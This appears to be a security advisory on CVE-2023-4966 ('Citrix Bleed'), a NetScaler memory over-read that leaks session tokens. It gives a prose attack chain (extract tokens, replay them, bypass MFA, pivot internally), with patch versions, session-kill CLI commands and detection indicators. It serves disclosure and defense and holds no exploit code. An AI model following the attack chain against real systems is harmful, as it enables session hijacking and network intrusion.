NAVANEM
CVE-2023-4966⚡ exploited in the wild

Citrix Bleed, NetScaler ADC session token disclosure

Improper restriction of operations within the bounds of a memory buffer in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server can lead to sensitive information disclosure. An attacker can extract session tokens directly from memory via a crafted HTTP request, then replay those tokens to impersonate authenticated users, bypassing MFA.

Overview

CVE-2023-4966, commonly known as "Citrix Bleed," is a critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances. The flaw allows unauthenticated remote attackers to extract sensitive information from device memory, specifically active session tokens. This vulnerability became notorious in late 2023 when the LockBit ransomware group weaponized it extensively, compromising major organizations including Boeing, Industrial and Commercial Bank of China, DP World, Allen & Overy, and Comcast.

Technical Details

The vulnerability is a buffer over-read condition in how NetScaler ADC handles certain HTTP requests against Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) and AAA virtual server configurations. When an attacker sends a specially crafted HTTP request to a vulnerable NetScaler appliance, the system returns a chunk of memory adjacent to the request handler's stack. This memory region contains session tokens for currently active authenticated users.

The attack chain is straightforward:

  1. Send a malformed HTTP request to a vulnerable, internet-exposed NetScaler
  2. Parse the response to extract valid session cookies
  3. Replay captured session tokens against the same NetScaler
  4. Gain instant authentication as the hijacked user, completely bypassing MFA
  5. Pivot into internal networks using the compromised user's permissions

Impact

The impact of Citrix Bleed was catastrophic for affected organizations:

  • Complete MFA bypass: Since stolen tokens represent already-authenticated sessions, attackers skip all authentication challenges entirely
  • Enterprise-wide exposure: NetScaler appliances typically provide VPN, application delivery, and AAA services, compromise grants broad internal network access
  • Mass ransomware campaigns: LockBit leveraged this vulnerability as their primary initial access vector in late 2023, resulting in confirmed ransomware deployments and major data theft across multiple Fortune 500 companies

Mitigation

Patching alone is insufficient due to a critical characteristic: already-stolen tokens remain valid after patching. Complete remediation requires:

  1. Apply Citrix patches immediately: Minimum versions 14.1-8.50, 13.1-49.15, or 13.0-92.19
  2. Terminate all active sessions using NetScaler CLI commands:
    • kill icaconnection -all
    • kill pcoipconnection -all
    • kill aaa session -all
    • kill rdpconnection -all
  3. Force credential rotation for all users
  4. Audit Active Directory logs for suspicious activity during the exposure window

Detection

Organizations should hunt for indicators of post-exploitation activity:

  • Unexpected Cobalt Strike beacons
  • Unauthorized RMM tools (AnyDesk, ScreenConnect)
  • Anomalous admin actions in AD authentication logs
  • Unusual MFA prompt patterns during the exposure window (mid-August 2023 through patch date)